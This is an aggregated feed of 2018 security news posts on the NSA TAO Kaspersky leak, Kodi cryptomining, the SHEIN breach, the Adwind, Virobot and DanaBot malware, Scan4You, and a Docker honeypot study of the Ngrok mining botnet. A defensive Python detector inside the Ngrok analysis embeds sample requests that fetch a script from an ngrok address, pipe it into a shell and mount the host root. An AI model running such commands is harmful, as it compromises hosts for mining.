The former NSA hacker is Nghia Hoang Pho (68), who served US intelligence for 10 years as a member of the NSA’s elite Tailored Access Operations hacking unit.

The man pleaded guilty in December 2017 to one count of willful retention of classified national defense information.

The Vietnam-born American citizen, who was living in Ellicott City, Maryland, was charged with illegally removing top secret materials.

The NSA hacker admitted taking home copies of classified NSA hacking tools and exploits with the knowledge that they were cyber weapons.

The tools were detected by the Kaspersky Lab software installed on the NSA hacker’s personal computer and were sent back to Kaspersky’s server for further analysis.

Kaspersky Lab published a detailed report on how cyber spies could have easily stolen the software exploits from the NSA employee’s Windows PC.

According to the prosecutors, between 2010 and 2015, the former NSA hacker had taken home with him TAO materials, including exploits and hacking tools.

According to the telemetry logs collected by the Russian firm, the staffer temporarily switched off the antivirus protection on the PC and infected his personal computer with spyware bundled in a product key generator while trying to use a pirated copy of Office.

On September 11, 2014, Kaspersky antivirus detected the Win32.GrayFish.gen trojan on the former NSA TAO member’s PC; some time later the employee disabled the Kaspersky software to execute the activation-key generator.

When the antivirus was reactivated on October 4, it removed the backdoored key-gen tool from the NSA employee’s PC and uploaded it to Kaspersky’s cloud for further analysis.

Kaspersky published a second report that sheds light on the investigation conducted by the firm into the NSA-linked Equation Group APT.

Kaspersky began searching its databases, going back to June 2014 (6 months prior to the alleged hack of its antivirus), for all alerts triggered by signatures matching wildcards such as “HEUR:Trojan.Win32.Equestre.*”. The experts found a few test signatures in place that produced a large number of false positives.

The analysis revealed a specific signature that fired a large number of times in a short time span on just one system, namely the signature “HEUR:Trojan.Win32.Equestre.m” and a 7zip archive (referred to below as “[undisclosed].7z”). This was the starting point of the analysis of the system, which was found to contain not only this archive but many files, both common and unknown, indicating that the user was probably related to the malware development.

The analysis of the computer where the archive was found revealed that it was already infected with malware. In October of that year the user downloaded a pirated copy of Microsoft Office 2013, but the .ISO contained the Mokes backdoor.

Kaspersky was able to detect and halt Mokes, but the user turned off the Russian software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two-month period its security software found 128 separate malware samples on the machine that weren’t related to the Equation Group.

Kaspersky found that the Mokes’ command and control servers were apparently being operated by a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com.”

The security firm explained that it’s also possible that the NSA contractor’s PC may have been infected with a sophisticated strain of malware developed by an APT that was not detected at the time.

According to the Wall Street Journal, the intrusion into Pho’s computer led to the Russians obtaining information on how NSA TAO hacks into foreign computer networks.

“As a result of his actions, Pho compromised some of our country’s most closely held types of intelligence, and forced NSA to abandon important initiatives to protect itself and its operational capabilities, at great economic and operational cost,” declared US Attorney Robert Hur.

The US Government banned the use of Kaspersky anti-virus software on government networks and accused the company of working for Russian intelligence.

Kaspersky has repeatedly denied any ties to the Russian intelligence and announced the launch of a transparency initiative that involves giving partners access to the source code of its solutions.

Pierluigi Paganini

(Security Affairs – Kaspersky Ban, NSA TAO)

The post Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak appeared first on Security Affairs.



Security Affairs: Crooks leverage Kodi Media Player add-ons for malware distribution

Security experts have spotted a Monero cryptomining campaign that abused Kodi add-ons to deliver a miner that targets both Linux and Windows systems.

Crooks are abusing Kodi Media Player to distribute malware: researchers from ESET recently spotted a cryptomining campaign that compromised over 5,000 computers.

Kodi users can add new functionality by installing add-ons that are available on the official Kodi repository and in several third-party stores.

An attacker can deliver malicious code by compromising the add-ons that are automatically updated by the Kodi media player.

According to ESET researchers, attackers can target Kodi to spread malware using three different mechanisms:

  1. They add the URL of a malicious repository to their Kodi installation so as to download some add-ons. The malicious add-on is then installed whenever they update their Kodi add-ons.
  2. They install a ready-made Kodi build that includes the URL of a malicious repository. The malicious add-on is then installed whenever they update their Kodi add-ons.
  3. They install a ready-made Kodi build that contains a malicious add-on but no link to a repository for updates. They are initially compromised, though receive no further updates to the malicious add-on. However, if the cryptominer is installed, it will persist and receive updates.

The malicious code distributed in this campaign is able to compromise both Windows and Linux platforms. It is a multi-stage malware that implements measures to make it hard for analysts to trace the malicious code back to the add-on.

Attackers added the malicious add-on to the XvMBC, Bubbles, and Gaia repositories.

Most of the infections were observed in the United States, Israel, Greece, the United Kingdom, and the Netherlands.

“After victims add the malicious repository to their Kodi installation, the malicious repository serves an add-on named script.module.simplejson – a name matching that of a legitimate add-on used by many other add-ons. However, while other repositories only have the script.module.simplejson add-on at version 3.4.0, the malicious repository serves this add-on with version number 3.4.1.” continues the report.

“Since Kodi relies on version numbers for update detection, all users with the Auto Update feature enabled (which is a common default setting) will automatically receive script.module.simplejson version 3.4.1 from the malicious repository.”

Although the main repositories used in this campaign are now either closed or cleaned, many devices are still running the malicious add-ons to mine Monero.

Researchers from ESET revealed that the crooks behind the campaign have already mined about $6,700 worth of Monero.

“According to these statistics of the malware authors’ Monero wallet, provided by Nanopool, a minimum of 4774 victims are affected by the malware at the time of writing, and have generated 62,57 XMR (about 5700 EUR or 6700 USD) as of this writing.” concludes the report.

Further details, including the IoCs, are available in the report.

Pierluigi Paganini

(Security Affairs – Kodi, malware)

The post Crooks leverage Kodi Media Player add-ons for malware distribution appeared first on Security Affairs.

SHEIN Data breach affected 6.42 million users

Another fashion retailer has suffered a data breach: the victim is SHEIN, which announced that the security breach affected 6.42 million customers.

The retailer hired a forensic cybersecurity firm as well as an international law firm to investigate the security breach.

SHEIN is now notifying affected users and it is urging them to change the password for their account.

Hackers accessed customers’ personal information, including the email addresses and encrypted password credentials of customers who visited the online store.

There are no technical details about the incident; the company only confirmed that it found malware on its servers and promptly removed it.

“In addition, SHEIN servers have been scanned and malware found on the servers has been removed. “Back door” entry points to the servers opened by the attackers have been closed and removed.” continues the press release.

The post SHEIN Data breach affected 6.42 million users appeared first on Security Affairs.

Security newsround: September 2018

We round up interesting research and reporting about security developments from around the web. This month: the devastation from NotPetya, a sound idea for authentication, help with NIST and cutting-edge security analysis.

The shipping news

If the truly wise learn from the experiences of others, then there are lessons galore from Maersk’s ransomware infection. You know, the one that cost the world’s largest shipping company $300 million. Thanks to an eye-watering account in Wired, you can vicariously experience the eye of a storm during a crippling ransomware outbreak.

The story details Maersk’s troubles during the NotPetya outbreak in 2017, aka “the most devastating cyberattack in history”. Weighing in at more than 6,000 words, it’s a meaty read. The excellent in-the-trenches reporting from Andy Greenberg offers plenty of ‘what-if’ scenarios that security and risk professionals can use for developing response plans.

Listen to this: a wearable solution to 2FA trouble?

Build a better mousetrap and the world will beat a path to your door. In this case, the trap in question is authentication. Researchers at the University of Alabama have developed a wearable device that uses two-factor authentication to foil attackers that are remote or in close proximity. It requires minimal effort on the part of users, who don’t even need to install browser plugins. CSO reports that “the browser would play back a short random code encoded into human speech when a user attempts to login”.

The University’s own summary describes it as “a complete re-design of the sound-based TFA systems to thwart both remote and proximity attacks”, while still being easy to use. Sophos notes that usability has been a sticking point when it comes to 2FA adoption. It cited one 2016 study showing that 28 per cent of users don’t use 2FA, and 60 per cent of those that do only do it because someone makes them. The original research paper is here.

Plotting a secure path through the NIST

This year, the National Institute of Standards and Technology updated its 2014 framework for improving the security of critical infrastructure. (Here’s the framework as a free PDF.) Now, Mukul Kumar and Anupam Sahai of Cavirin Systems have written a guide to help security professionals turn the framework theory into security reality for their needs. They outline five high-level steps for following the NIST advice, with detailed explanations for each step.

Researchers look to security’s future at Usenix 2018

The 27th Usenix security symposium took place in August, and it often hosts interesting sessions giving a glimpse of where security might be heading. This year was no exception, with the largest event in the conference’s history. Researchers from around the world presented at the three-day event. As part of their commitment to open access to research, the organisers publish links to all 100 papers at Usenix’s publications page.

There’s no shortage of tantalising titles to choose from. Among our favourites are: You can run, but can you hide? (analysing privacy protection in fitness trackers), The Battle for New York: (a case study of enterprise-level digital threat modelling), and O Single Sign-Off, Where Art Thou? (which analyses single sign-on account hijacking).

Possibly the best is Harvard professor James Mickens’ 50-minute keynote called “Q: Why Do Keynote Speakers Keep Suggesting That Improving Security Is Possible? A: Because Keynote Speakers Make Bad Life Decisions and Are Poor Role Models”.

Things we liked

Europol warns that GDPR fears could lead breached companies to do deals with cybercriminals to avoid regulatory fines. MORE

The world is changing. Time to change how security professionals and CISOs approach their roles, argues Joseph DiBiase. MORE

Is two-factor authentication the security panacea some claim it is? Stuart Schechter argues caution before making the leap: “All security measures have trade-offs”, he warns. MORE

Patch, and patch often. This piece asks why does it take so long to install security updates? MORE

As the UK data protection regulator imposes a £500,000 fine on Equifax, the Register describes the company’s security failings as “the gift that keeps on giving”. MORE


The post Security newsround: September 2018 appeared first on BH Consulting.

Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems

Researchers from ReversingLabs and Cisco Talos have uncovered a new Adwind campaign that targets Linux, Windows, and macOS systems.

Security experts from ReversingLabs and Cisco Talos have spotted a new Adwind campaign that targets Linux, Windows, and macOS systems.

Adwind is a remote access Trojan (RAT); the samples used in the recently discovered campaign are Adwind 3.0 RAT and leverage the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel.

The campaign was uncovered at the end of August. Attackers mainly targeted users in Turkey (75%); experts noticed that the other victims were located in Germany, but were likely members of the Turkish community.

The spam campaign uncovered by the experts leveraged malicious documents written in Turkish.

“This new campaign, first discovered by ReversingLabs on Sept. 10, appears to be a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel that has appeared in the wild in the past. This time, the variant is able to avoid detection by malware-blocking software. ReversingLabs has written their own blog on this issue here.” reads the analysis published by Cisco Talos.

The experts observed at least two different droppers in this campaign, using .csv and .xlt files, both of which are opened by Microsoft Excel by default.

Both leverage a new variant of the DDE code injection attack; although the technique is well known, the variant used in this campaign was still undetected.

The dropper file can use any of more than 30 different file extensions. Some of them are not opened by Excel by default; however, the attackers can use a script that launches Excel with a file bearing one of these extensions as a parameter.

“Formats like CSV don’t have a predefined header, thus they can contain any kind of data at the beginning. Having random data like in the samples we found may trick the anti-virus into skipping the file scanning. Other formats may be considered corrupted, as they might not follow the expected format.” continues the report.

Excel will display different warnings to the user regarding the execution of code: the first relates to the execution of a corrupted file, the second notifies the user that the document will execute the application “CMD.exe.”

If the user accepts all the warnings, the application is executed on the system.

Talos pointed out that the attackers aim to inject code that creates and executes a Visual Basic Script; the script uses the Microsoft bitsadmin tool, which downloads or uploads jobs and monitors their progress, to retrieve the final payload in the form of a Java archive.

The Java code is packed with the demo version of the Allatori Obfuscator commercial packer, version 4.7.

The final payload is a sample of the Adwind RAT v3.0.

“The DDE variant used by the droppers in this campaign is a good example on how signature based antivirus can be tricked. It is also a warning sign regarding the file extension scanning configurations.” Talos concludes.

“This kind of injection has been known for years; however, this actor found a way to modify it in order to have an extremely low detection ratio.”

Further details, including IoCs, are reported in the analysis published by Talos.

Pierluigi Paganini

(Security Affairs – Adwind RAT, malware-as-a-service)

The post Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems appeared first on Security Affairs.

Malware hits Freelancers at Fiverr and Freelancer.com

By Waqas

Unfortunately, unsuspecting freelancers are falling for the malware scam. Fiverr and Freelancer.com are two of the most popular websites for freelancers and clients looking for skilled professionals. Currently, both sites have millions of registered users from hundreds of countries and that makes them lucrative targets for cybercriminals. Recently, security researchers at MalwareHunterTeam have discovered a new piece of […]

This is a post from HackRead.com Read the original post: Malware hits Freelancers at Fiverr and Freelancer.com

Security Affairs: Security Affairs newsletter Round 181 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online with a special deal: 20% discount (Kindle Edition, Paper Copy).

Once again thank you!

Cyber attack took offline flight display screens at the Bristol Airport
Feedify cloud service architecture compromised by MageCart crime gang
Researcher devised a new CSS & HTML attack that causes iPhone reboot or freezes Macs
EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS
Google Android team found high severity flaw in Honeywell Android-based handheld computers
Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia
One year later BlueBorne disclosure, over 2 Billion devices are still vulnerable
A flaw in Alpine Linux could allow executing arbitrary code
Amazon is investigating allegations that its staff is selling customer data
Cracked Windows installations are serially infected with EternalBlue exploit code
New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms
NSO mobile Pegasus Spyware used in operations in 45 countries
Access to over 3,000 compromised sites sold on Russian black marketplace MagBo
Dissecting the first Gafgyt bot implementing the Non Un-Packable NUP technique
Evolution of threat landscape for IoT devices – H1 2018
Flaw in Western Digital My Cloud exposes the content to hackers
Mirai authors avoid the jail by helping US authorities in other investigations
Adobe issued a critical out-of-band patch to address CVE-2018-12848 Acrobat flaw
Magecart cybercrime group stole customers credit cards from Newegg electronics retailer
Sustes Malware: CPU for Monero
US State Department confirms data breach to unclassified email system
Cisco fixes Remote Code Execution flaws in Webex Network Recording Player
Expert disclosed an unpatched zero-day flaw in all supported versions of Microsoft Windows
Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange
Homebuyers Being Targeted by Money Transfer Scam
DanaBot banking Trojan evolves and now targets European countries
Ngrok Mining Botnet
Operator of Scan4You Malware-Scanning sentenced to 14 Years in prison


Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 181 – News of the week appeared first on Security Affairs.

New Virobot malware combines ransomware and botnet capabilities

Security experts from Trend Micro discovered a new malware tracked as Virobot that combines ransomware and botnet capabilities.

Virobot encrypts files on infected machines and also implements spam botnet capabilities, which it leverages to target other systems.

Virobot was first spotted on September 17, 2018; experts pointed out that it is not associated with any known ransomware family.

The analysis of the infection chain revealed that once Virobot is downloaded to a machine, it will check the presence of specific registry keys (machine GUID and product key) to determine if the files on the system should be encrypted.

It then uses a cryptographic random number generator to generate the encryption and decryption key, and sends it, along with data related to the infected machine, to the command and control (C&C) server via a POST request.

The malicious code targets the most popular file types, including .txt, .docx, .xlsx, .pptx, .jpg, .png, .csv, .sql, .mdb, .php, .asp, .xml, .psd, .odt, and .html.

The experts highlighted a curiosity about the ransom note and ransom screen displayed by the malware: even though it currently targets users in the US, the ransom note is written in French:

[Figure: Virobot ransom note]

Virobot also implements a keylogging feature that collects keystrokes, and it is able to download additional files from the C&C server.

“Virobot also has a keylogging feature and connects back to its C&C server to send logged key strokes from an infected machine. Once connected to the C&C, it may download files – possibly another malware binary – and execute it using PowerShell.” reads the analysis published by Trend Micro.

The malware uses the infected machine’s Microsoft Outlook to implement the spam botnet capability and spread to the user’s contact list. Virobot sends the victim’s contacts a copy of itself or a malicious file downloaded from its C&C server.

Virobot encrypts files after a successful connection with the C&C server, but at the time of writing the command and control infrastructure had been taken down.

“Individuals and enterprises should use a multi-layered approach to mitigate the risks brought by threats like ransomware,” concludes Trend Micro.

Pierluigi Paganini

(Security Affairs – Virobot, malware)

The post New Virobot malware combines ransomware and botnet capabilities appeared first on Security Affairs.

Thousands of stolen frequent flyer miles of top airlines sold on Dark Web

By Waqas

The Dark Web has become a business hub for malicious hackers and cybercriminals. It seems like there is nothing that is spared from the prying eyes of cybercriminals and the Dark Web has become a thriving ground for all types of illegally acquired data and criminal activities. However, this time around researchers from CompariTech haven’t identified […]

This is a post from HackRead.com Read the original post: Thousands of stolen frequent flyer miles of top airlines sold on Dark Web

Hacker gets 14 years jail time for operating Scan4You malware scanning service

By Waqas

Scan4You was a VirusTotal-like platform used for malicious purposes. A 37-year-old male from Riga, Latvia, has received a 14-year sentence for creating and running Scan4You, a counter antivirus service that helped malware developers check the detection rates of their malicious software. The convict has been identified as a Latvian non-citizen, namely Ruslan Bondars […]

This is a post from HackRead.com Read the original post: Hacker gets 14 years jail time for operating Scan4You malware scanning service

Operator of Scan4You Malware-Scanning sentenced to 14 Years in prison

The Latvian expert Ruslans Bondars (37), who developed and ran the counter antivirus service Scan4You, has been sentenced to 14 years in prison.

Bondars was convicted of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“A Latvian “non-citizen,” meaning a citizen of the former USSR who resided in Riga, Latvia, was sentenced to 168 months in prison today for offenses related to his operation of “Scan4you,” an online counter antivirus service that helped computer hackers determine whether the computer viruses and other malicious software they created would be detected by antivirus software, announced Assistant Attorney General Brian A.” reads the press release published by DoJ.

Scan4you was a VirusTotal-like online multi-engine antivirus scanning service that could be used by vxers to test the evasion abilities of their malware against the major antivirus products.

Unlike VirusTotal, Scan4you offered a totally anonymous service to its users; this means that data related to the scans of uploaded files were not shared with the antivirus firms.

Bondars is one of the two hackers found to have run Scan4you from 2009 to 2016; the service was very popular in the cybercrime community and was used by malware developers to test their malicious code.

Ruslans Bondars pleaded guilty on May 16 in federal court in Alexandria; according to a co-conspirator, the man had helped Russian law enforcement.

The other hacker who operated the Scan4you service, Jurijs Martisevs, was arrested while on a trip to Latvia and extradited to the United States. He pleaded guilty to the same charges as Bondars in March 2018.

The Scan4you service allowed its customers to develop malicious code that was used to steal millions of payment cards from retail stores across the world; overall losses have been estimated at $20.5 billion.

“In issuing the sentence, the court found a loss amount of $20.5 billion. In addition to the term of imprisonment, U.S. District Judge Liam O’Grady ordered Bondars to serve three years of supervised release. A decision regarding forfeiture and payment of restitution to victims of the offenses is forthcoming.” continues the press release.

“A Scan4you customer, for example, used the service to test malware that was subsequently used to steal approximately 40 million credit and debit card numbers, as well as approximately 70 million addresses, phone numbers and other pieces of personal identifying information, from retail store locations throughout the United States, causing one retailer approximately $292 million in expenses resulting from the intrusion.”

The DoJ cited the case of a Scan4you customer who used the service to test malware that was then used to steal approximately 40 million credit and debit card numbers, along with other personal information, from a US retailer, causing it $292 million in losses.

A second customer used Scan4you to contribute to the development of the infamous Citadel malware, which caused over $500 million in fraud-related losses.

“Ruslans Bondars helped malware developers attack American businesses,” explained Assistant Attorney General Benczkowski.

“The Department of Justice and its law enforcement partners make no distinction between service providers like Scan4You and the hackers they assist: we will hold them accountable for all of the significant harm they cause and work tirelessly to bring them to justice, wherever they may be located.”

Pierluigi Paganini

(Security Affairs – Scan4You, malware)

The post Operator of Scan4You Malware-Scanning sentenced to 14 Years in prison appeared first on Security Affairs.

DanaBot banking Trojan evolves and now targets European countries

Security experts at ESET have recently observed a surge in activity of DanaBot banking Trojan that is now targeting Poland, Italy, Germany, Austria, and as of September 2018, Ukraine.

Security experts at ESET have recently observed a surge in activity of DanaBot banking Trojan that was first spotted earlier this year.

DanaBot is a multi-stage modular banking Trojan written in Delphi; the malware allows its operators to add new functionality through plug-ins.

Below are some of the plug-ins that were used in previous attacks against Australian banks in May 2018:

  • VNC plug-in – establishes a connection to a victim’s computer and remotely controls it
  • Sniffer plug-in – injects malicious scripts into a victim’s browser, usually while visiting internet banking sites
  • Stealer plug-in – harvests passwords from a wide variety of applications (browsers, FTP clients, VPN clients, chat and email programs, poker programs etc.)
  • TOR plug-in – installs a TOR proxy and enables access to .onion web sites

When it was analyzed by Proofpoint, its experts speculated that the threat was under active development.

The banking Trojan initially targeted users in Australia and Poland, then expanded to other countries, including Italy, Germany, Austria, and as of September 2018, Ukraine.

The campaign targeting Poland is still ongoing and is the largest one; attackers used spam messages to compromise victims, leveraging the Brushaloader technique, a combination of PowerShell and VBS scripts.

Earlier in September, a series of smaller campaigns targeted banks in Italy, Germany, and Austria.

“Further to this development, on September 8, 2018, ESET discovered a new DanaBot campaign targeting Ukrainian users.” reads the analysis published by ESET.

“Figure 2 shows a spike in the DanaBot detection rate at the turn of August and again in September 2018, as seen in our telemetry data.”

Experts noticed that the attackers have introduced several changes to the DanaBot plug-ins since the previously reported campaigns; for example, the Stealer plug-in has also been compiled as a 64-bit version since August 25, 2018.

Since the beginning of September 2018, the author of DanaBot has also implemented an RDP plug-in based on the open-source project RDPWrap, which provides Remote Desktop Protocol connections to Windows machines that normally do not support them.

The RDP plug-in was added because the protocol is less likely to be blocked by firewalls; experts also highlighted that RDPWrap allows several users to use the same machine concurrently. This aspect is very important because the attackers can perform reconnaissance while the victim is still using the machine.

DanaBot is a very active threat; its operators continue to improve it while targeting European countries.

“The new features introduced in these latest campaigns indicate the attackers behind DanaBot continue to make use of the malware’s modular architecture to increase their reach and success rate.” concludes ESET.

Further details, including IoCs, are reported in the analysis published by ESET.

Pierluigi Paganini

(Security Affairs – DanaBot, hacking)

The post DanaBot banking Trojan evolves and now targets European countries appeared first on Security Affairs.

Ngrok Mining Botnet

The Ngrok campaign is unique in terms of its overall sophistication for a Docker-based attack vector.

Specifically, it demonstrates a novel, dynamic and robust operational security model and the ability to detect and attack newly deployed and misconfigured infrastructure.

Additionally, the campaign is sophisticated in seeking to detect, analyse and neutralise other competing crypto-mining malware. Its agile process can be flexed to quickly deal with new entrant-attacks and ensure a full share of the victim’s CPU resources for its activities.

Introduction

In my previous post I discussed the initial prototyping of a Docker Honeypot / Sandbox called Whaler. I’ve now been running this for a few months and tracking the number of campaigns with a range of sophistication. The most sophisticated of these was the first attack observed within hours of the initial deployment. I named the campaign Ngrok after the inventive reverse proxy used to hide the C2 infrastructure.

I’ve been following the Monero mining pool address used in the Ngrok campaign and regularly checking for other research references on the internet. The campaign has gone largely unnoticed until a recent blog published by 360totalsecurity, which prompted me to finally write up the analysis. As of today (20 Sept) the campaign is still active.

Note: I’d previously documented this as a presentation which I’ve been using in job interviews – key slides are extracted and covered below.

Summary of observed attacks

Whaler – attack types and analysis

Before getting into the details of the Ngrok campaign, it’s worth summarising the key findings from the first few months of operations and development. Firstly, nearly all attacks observed were crypto-mining attacks. One exception appeared to attempt to stage a meterpreter payload to the server, but I was unable to follow up in time on this and the attacker did not repeat the attack.

Most attackers seem to rely on discovery and indexing by Shodan as a source for their target list. There’s a clear correlation between the honeypot first appearing on Shodan and an immediate wave of attacks.

The attacks broadly fall into three levels of sophistication:

  • Low Complexity – Simply pulling a pre-baked mining image from Docker Hub and running it with parameterisation for the attacker’s mining pool / account
  • Medium Complexity – Again using Docker Hub, but creating their own container images, often with misleading names (e.g. mysql) but essentially containing a fully configured crypto-miner. Several of these were reported and quickly shut down, working with the Docker security team. Other malware, such as an IRC botnet, was also observed bundled with the miner software.
  • High Complexity – These attackers either ran their own target scanning operations, or leveraged their botnets to do this work for them. They were therefore able to detect and attack victims much more quickly. Some of these attacks used the volume mounting feature of the Docker daemon to execute a container escape – and therefore could install their payloads on the “host” system – invisible to Docker and to any monitoring of running containers.

First Attack

Attack timing for Ngrok campaign


The first attack was observed within a few hours of deploying the initial Whaler prototype. The attack was occurring approximately every 2 hours in a continuous cycle – which indicates the attack is automated.

Pcap analysis of Ngrok attack

The user agent string confirms this is likely automated, and the attacker is using an open-source, lightweight Ruby-based Docker API client framework from Swipely.

The attacking IP address is consistently hidden behind a VPN service.

Exploit

Whaler “Fingerprint” for Ngrok attack

Whaler was enhanced to provide a “fingerprint” of each attack. This is used to determine how much of the attack data (Docker images, containers, pcap files etc) to retain, based on the probability this attack has already been seen. Automated attacks can drive a large amount of data storage requirements if this isn’t managed carefully!

The attack fingerprint for Ngrok is shown above. Key features are:

  • The attacker uses a public alpine Docker image, pre-installed with curl. There is nothing malicious about this publicly available container
  • The container is parameterised to use curl to download and run a staging script from an ngrok reverse proxy address, i.e. hiding the backend C2 infrastructure
  • Note: the ngrok.io subdomains are rotated through a set of 52 which are replaced every 8 hours
  • Each victim has a unique hash identifier to identify their IP – this is used for reporting back to the C2 on details of the host and infection status
  • The container mounts the root file system of the host and creates a crontab entry to execute the stager script outside of Docker – this is a classic Docker container escape
  • There is a parameter to identify that the stager for Docker (d) should be downloaded – the attacker has a broader target scope including other misconfigured products, as discussed later
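The fingerprint features listed above can be turned into a small defensive check over the JSON body of a Docker Engine API `POST /containers/create` request, as a honeypot like Whaler or a proxy in front of a daemon would see it. This is an added example and not code from the post or from Whaler; the request bodies are constructed samples, the ngrok subdomains and per-victim hashes are placeholders, and the list of sensitive host paths is my own assumption.

```python
"""Flag and fingerprint risky Docker container-create requests.

Added example, not code from the post or from Whaler. Request bodies are
constructed samples shaped like a Docker Engine API `POST /containers/create`
body; ngrok subdomains and victim hashes are placeholders.
"""
import hashlib
import json
import re
from typing import Dict, List

# Constructed sample resembling the Ngrok fingerprint: public image with curl,
# stager pulled from an ngrok.io address and piped into a shell, host root
# bound into the container (the volume-mount escape the post describes).
NGROK_STYLE_REQUEST = json.dumps({
    "Image": "alpine:latest",
    "Cmd": ["sh", "-c", "curl -s http://a1b2c3d4.ngrok.io/d/9f86d081884c7d65 | sh"],
    "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
})

# Same campaign shape with a rotated subdomain and a different victim hash:
# the fingerprint should be identical so duplicates need not be retained.
ROTATED_SUBDOMAIN_REQUEST = json.dumps({
    "Image": "alpine:latest",
    "Cmd": ["sh", "-c", "curl -s http://z9y8x7w6.ngrok.io/d/3a7bd3e2360a3d29 | sh"],
    "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
})

# Constructed benign request: a web server with a read-only content mount.
BENIGN_REQUEST = json.dumps({
    "Image": "nginx:1.15",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
})

# Assumed list: host paths whose exposure lets a container act on the host
# (cron directories are how the Ngrok stager escapes, per the post).
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/var/run/docker.sock", "/var/spool/cron")

NGROK_HOST_RE = re.compile(r"\b[a-z0-9-]+\.ngrok\.io\b")
HEX_TOKEN_RE = re.compile(r"\b[0-9a-f]{16,}\b")  # assumed shape of victim identifiers
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")


def host_path(bind: str) -> str:
    """Return the host side of a 'host:container[:opts]' bind string."""
    return bind.split(":", 1)[0]


def mounts_sensitive_host_path(bind: str) -> bool:
    """True if the bind exposes the host root or another sensitive host path."""
    hp = host_path(bind)
    if not hp.startswith("/"):
        return False  # a named volume, not a host path
    if hp == "/":
        return True
    return any(hp == p or hp.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def analyse_create_request(body: str) -> Dict[str, object]:
    """Return findings plus a stable fingerprint for one container-create body."""
    req = json.loads(body)
    host_cfg = req.get("HostConfig") or {}
    cmd = req.get("Cmd") or []
    cmdline = " ".join(cmd) if isinstance(cmd, list) else str(cmd)
    binds = sorted(host_cfg.get("Binds") or [])
    findings: List[str] = []

    for bind in binds:
        if mounts_sensitive_host_path(bind):
            findings.append(f"sensitive host path bound into container: {bind}")
    if host_cfg.get("Privileged"):
        findings.append("privileged container requested")
    if PIPE_TO_SHELL_RE.search(cmdline):
        findings.append("command downloads a script and pipes it into a shell")
    for host in NGROK_HOST_RE.findall(cmdline):
        findings.append(f"command fetches from a tunnelling service: {host}")

    # Normalise the parts that rotate per victim/subdomain before hashing so
    # one campaign yields one fingerprint even as its infrastructure rotates.
    normalised = HEX_TOKEN_RE.sub("<hash>", NGROK_HOST_RE.sub("<ngrok>", cmdline))
    fp_source = "|".join([
        str(req.get("Image")), normalised, ",".join(binds),
        str(bool(host_cfg.get("Privileged"))),
    ])
    return {
        "image": req.get("Image"),
        "findings": findings,
        "risky": bool(findings),
        "fingerprint": hashlib.sha256(fp_source.encode()).hexdigest()[:16],
    }


if __name__ == "__main__":
    for name, body in [("ngrok-style", NGROK_STYLE_REQUEST), ("benign", BENIGN_REQUEST)]:
        result = analyse_create_request(body)
        print(name, result["fingerprint"], result["findings"])
```

The two Ngrok-style bodies differ only in the rotated subdomain and victim hash, so they collapse to one fingerprint, which is the retention decision the post describes.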

Stage1 – Loader

The loader script, once running on the host system (outside of Docker), performs the following actions.

  • Enumerate all processes and immediately kill any that meet a pre-defined kill list (other mining processes)
  • Install the miner for the attacker by downloading two further binaries
  • Report back to the C2 server (via ngrok) on the following:
    • Process ID of the infection by this attack
    • Number of CPUs
    • Current Username
    • Process name, binary location and MD5 sum of binary of anything currently running above 20% CPU

The last data point reported here enables the attacker to identify new mining campaigns and adjust their script to also target termination of those processes where found.

During the course of the analysis it was also noted that additional code was added to search for and inject Coinhive mining code into any javascript files found on the server. If these are then served via a web server it would result in further browser-based mining on behalf of the attacker.

Stage 2 – Scanner

Once the installation has been successfully completed and the infection has been reported back to the C2 infrastructure, a second script is delivered using the same mechanism as before (container escape -> cron job).

This second stage is used to enlist the victim to mas-scan a large section of IPv4 space looking for further victims. The script downloads Zmap, Zgrab and JQ and performs a scan of a pre-defined series of 8K blocks of the internet looking for:

  • Redis on port 6379
  • Docker on port 2375
  • Jenkins, Drupal and Modx on ports 80 and 8080
  • CouchDB on 5984
  • Ethereum on 8545

Results are reported back to the C2, and hence the cycle repeats.

Overview of Attacker Infrastructure

Ngrok

An overview of the Ngrok infrastructure is shown above.

Hash Rate & Payment History

Ngrok
Ngrok account hash rate over time

The deployed miner was configured to use the minexmr pool, and the wallet id used is:

4AuKPF4vUMcZZywWdrixuAZxaRFt9FPNgcv9v8vBnCtcPkHPxuGqacfPrLeAQWKZpNGTJzxKuKgTCa6LghSCDrEyJ5s7dnW

Using this we can see that this account was first used in early April, with approximate hashing capacity of 30-40k/s and there was a significant increase in capacity in early June, peaking at 90k/s. This uplift correlates with  360totalsecurity’s observation that the attacks “started in June” – perhaps indicating an additional target infrastructure that triggered their honeypots.

For reference, benchmarking the miner on a 1 CPU cloud server, the peak mining capacity here would be in the region of 2000 virtual CPUs.

Ngrok 9

Ngrok cumulative profit

The campaign has produced a steady, but relatively low, stream of income. It is possible that other accounts are used – in fact we also have the Coinhive account, which we are unable to determine the hashing rate or any payment details.

Between April and late August the attackers had made approx £5000 GBP.

Further details includig IoC are available at the following URL:

Ngrok Mining Botnet

About the author: oncyberblog.wordpress.com staff

Pierluigi Paganini

(Security Affairs – Ngrok, malware)

The post Ngrok Mining Botnet appeared first on Security Affairs.

Security Affairs: Ngrok Mining Botnet

The Ngrok campaign is unique in terms of its overall sophistication for a Docker-based attack vector.

